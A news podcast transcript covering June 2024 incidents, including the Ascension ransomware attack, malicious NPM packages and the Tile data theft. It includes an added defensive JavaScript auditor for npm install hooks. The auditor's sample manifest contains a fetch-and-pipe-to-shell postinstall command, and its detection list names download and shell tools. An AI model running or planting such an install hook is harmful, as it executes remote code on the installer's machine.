An employee downloaded a file that led to hospital chain’s ransomware attack
Welcome to Cyber Security Today. It’s Friday June 14th, 2024. I’m Howard Solomon, contributing reporter on cybersecurity for TechNewsday.com.
An employee downloaded a malicious file they thought was legitimate. That’s the explanation for many successful cyber attacks. The latest American organization to admit that’s how it was hit is Ascension, a hospital and senior care chain with 180 facilities in 19 states and the District of Columbia. In a statement the company said the ransomware attackers took files from seven of its 25,000 servers. Some of the stolen data may include protected health information and personally identifiable information. The data wasn’t taken from electronic health records systems. Hospitals have restored some of the affected IT systems.
The group behind the Black Basta ransomware strain may have been exploiting a Windows vulnerability before it was patched last month. Researchers at Symantec say they’ve found evidence an exploit tool may have been compiled before the patch was released on March 12th. The tool was seen by Symantec in an attempted ransomware attack on an unnamed organization. The tactics used were very similar to those described by Microsoft in a recent Black Basta attack. These included the use of batch scripts masquerading as software updates.
There’s another reminder of the risk of being hit by ransomware: According to researchers at Veeam, 18 per cent of any data encrypted by ransomware won’t be recoverable. The information is part of the company’s 2024 Ransomware Trends Report. Another finding: IT departments that rush to get back online fast may also increase the odds of getting hacked again because they skip steps like making sure systems are completely clean.
Another North Korean threat actor is trying to compromise open-source applications through malicious packages on the NPM registry. According to researchers at Checkmarx, the group dubbed Moonstone Sleet is following in the footsteps of another group, dubbed Jade Sleet. Moonstone Sleet has been planting infected packages on the NPM registry since late last year. Lately their malware not only goes after Windows applications but also Linux systems. The goal of these efforts is to compromise organizations that download open-source applications. This kind of third-party attack is aimed at stealing data. Developers who download code from any open-source repository have to take care before adding it to their apps.
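One concrete way to "take care" before adding an NPM package is to inspect its manifest for install-time lifecycle hooks, since a package that runs a command the moment it is installed deserves a manual look. The following is an added example, not code from the podcast or from Checkmarx; the manifests and the list of patterns it flags are constructed here for illustration.

```javascript
// Added example: audit an npm package.json for lifecycle hooks that execute
// at install time. Such hooks are legitimate in some packages, so the result
// is a review list, not a verdict.

// npm runs these scripts automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Constructed patterns: commands that fetch or evaluate code at install time
// are the ones most worth a closer look before the package is adopted.
const SUSPICIOUS = [
  /\bcurl\b/,
  /\bwget\b/,
  /\bnode\s+-e\b/,
  /\beval\b/,
  /base64/i,
  /\|\s*(sh|bash)\b/,
  /powershell/i,
];

// Returns one finding per install-time hook present in the manifest.
// severity is "high" when a suspicious pattern matches, otherwise "review".
function auditManifest(pkg) {
  const findings = [];
  const scripts = pkg && pkg.scripts && typeof pkg.scripts === 'object' ? pkg.scripts : {};
  for (const hook of INSTALL_HOOKS) {
    if (!Object.prototype.hasOwnProperty.call(scripts, hook)) continue;
    const command = String(scripts[hook]);
    const matched = SUSPICIOUS.filter((re) => re.test(command)).map((re) => re.source);
    findings.push({
      hook,
      command,
      severity: matched.length > 0 ? 'high' : 'review',
      matched,
    });
  }
  return findings;
}

// Compact summary suitable for a CI gate or a pre-merge checklist.
function summarize(pkg) {
  const findings = auditManifest(pkg);
  return {
    name: pkg.name,
    hooks: findings.length,
    high: findings.filter((f) => f.severity === 'high').length,
  };
}

// Constructed sample manifests (not real packages).
const CLEAN_PKG = {
  name: 'example-clean',
  version: '1.0.0',
  scripts: { test: 'node test.js', build: 'tsc' },
};
const BENIGN_HOOK_PKG = {
  name: 'example-benign-hook',
  version: '1.0.0',
  scripts: { prepare: 'husky install' },
};
const HOOKED_PKG = {
  name: 'example-hooked',
  version: '1.0.0',
  scripts: { postinstall: 'curl -s https://example.invalid/setup.sh | sh', build: 'tsc' },
};

for (const pkg of [CLEAN_PKG, BENIGN_HOOK_PKG, HOOKED_PKG]) {
  console.log(JSON.stringify(summarize(pkg)), JSON.stringify(auditManifest(pkg)));
}
```

In practice the same check is run against the manifest of every package in the lockfile, not only direct dependencies, and `npm install --ignore-scripts` can be used while the review list is worked through.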
A crook is using a vulnerability in the PHP language to deliver ransomware. According to researchers at Imperva, the attackers are using unpatched applications with PHP scripts to upload nasty payloads. One is a .NET variant of the TellYouThePass ransomware strain. A patch for this vulnerability was released June 6th.
An AI bug bounty program has identified more vulnerabilities in open-source artificial intelligence applications. Protect AI’s latest report says there are holes in Intel’s Neural Compressor and Triton’s Inference Server. These vulnerabilities were reported at least 45 days ago. Patches may be available now.
Remember the 2019 SolarWinds hack? The one where the update mechanism of the SolarWinds Orion network management platform was compromised by alleged Russian hackers to spread a malicious update? An article this week in ProPublica quotes a former Microsoft security official saying a vulnerability in Active Directory Federation Services, which enables single-sign-on, played a role in that and other hacks. Andrew Harris is quoted as saying Microsoft didn’t want to move quickly to plug the hole by disabling ADFS. One of the alleged reasons: It might cost Microsoft the chance of getting a huge federal computing contract. In other words, it allegedly put profit before security. Harris was scheduled to testify yesterday on Capitol Hill, before this podcast was recorded.
Life360, which makes the Tile wireless device tracker to find lost or stolen keys, luggage, cars and other items, has suffered a data theft. The company says it received emails from a threat actor claiming to possess information about Tile purchasers. The data includes names, physical addresses, email addresses, phone numbers and Tile device ID numbers.
A U.S. jury has convicted a Nigerian man of being part of a conspiracy that ran a business email compromise scam. The con involved sending businesses emails that looked like they came from trusted partners like banks. Instead the messages led to the installation of data-stealing malware. After that there were follow-up emails asking victims to transfer funds to accounts the crooks controlled. The man will be sentenced August 27th. A co-conspirator pleaded guilty last month and will be sentenced in September.
How can your firm respond to disinformation? Toronto Metropolitan University’s think tank called The Dias has released a piece on what to do. It’s aimed at Canadian businesses, but it applies to companies anywhere. Among the recommendations: Have a team monitor the internet, and particularly social media, for mentions of your firm and have a response plan ready to counter misinformation.
Later tonight the Week in Review podcast will be available. Guest Terry Cutler of Cyology Labs and I will discuss the latest news on Snowflake attacks, common vulnerabilities found by a penetration test platform and cybersecurity help for American rural hospitals.
Links to details about news mentioned in this podcast episode are in the text version at TechNewsday.com.
Follow Cyber Security Today on Apple Podcasts, Spotify or add us to your Flash Briefing on your smart speaker.